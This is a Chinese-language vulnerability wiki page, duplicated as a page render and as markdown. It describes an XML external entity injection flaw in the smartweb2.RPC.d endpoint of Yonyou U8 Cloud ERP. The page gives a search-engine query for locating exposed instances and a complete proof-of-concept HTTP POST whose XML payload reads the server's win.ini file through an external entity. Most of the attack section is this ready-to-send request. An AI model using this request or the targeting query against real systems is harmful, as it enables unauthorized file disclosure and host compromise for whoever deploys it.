fofamini-wiki

登录白背景

源码

用友U8 Cloud smartweb2存在xxe漏洞

一、漏洞简介

用友U8 Cloud是用友公司推出的企业上云数字化平台，为成长型和创新型企业提供全面的云ERP解决方案。用友U8 Cloud hrss下smartweb2.RPC.d接口存在XML外部实体注入漏洞，由于用友U8 Cloud 未对用户的输入进行有效的过滤，攻击者可通过xml实体注入漏洞获取敏感信息，进一步利用可造成主机失陷。

二、影响版本

用友U8 Cloud

三、资产测绘

hunterapp.name="用友 U8 Cloud"

登录页面

四、漏洞复现

POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Accept: */*
Cookie: JSESSIONID=C2CFFE1429FF812ABF357C2BDD5BDBC1.server; JSESSIONID=8FEF31DBA1E3188706B14123C6D1CE87.server
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 672

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini">]><rpc transaction="10" method="resetPwd"><vps><p
name="__profileKeys">%26Password;</p
></vps></rpc>

原文: https://www.yuque.com/xiaokp7/ocvun2/hzi43divd1havflk

# 用友U8 Cloud smartweb2存在xxe漏洞

# 一、漏洞简介
  用友U8 Cloud是用友公司推出的企业上云数字化平台，为成长型和创新型企业提供全面的云ERP解决方案。用友U8 Cloud hrss下smartweb2.RPC.d接口存在XML外部实体注入漏洞，由于用友U8 Cloud 未对用户的输入进行有效的过滤，攻击者可通过xml实体注入漏洞获取敏感信息，进一步利用可造成主机失陷。

# 二、影响版本

- 用友U8 Cloud

# 三、资产测绘

- hunter`app.name="用友 U8 Cloud"`

![image.png](./img/T5p5cAdbPQ9663tS/1692444362525-121bbed1-c72d-4cad-99db-3e18509417c1-527774.png)

- 登录页面

![image.png](./img/T5p5cAdbPQ9663tS/1692444381978-7d4ed5bf-a153-47e5-88e6-4dd97953e976-196542.png)

# 四、漏洞复现
```
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Accept: */*
Cookie: JSESSIONID=C2CFFE1429FF812ABF357C2BDD5BDBC1.server; JSESSIONID=8FEF31DBA1E3188706B14123C6D1CE87.server
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 672

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini">]><rpc transaction="10" method="resetPwd"><vps><p
name="__profileKeys">%26Password;</p
></vps></rpc>
```
![image.png](./img/T5p5cAdbPQ9663tS/1705238554218-8959a7a6-cb10-45ee-9a26-935956bb19dc-644936.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hzi43divd1havflk>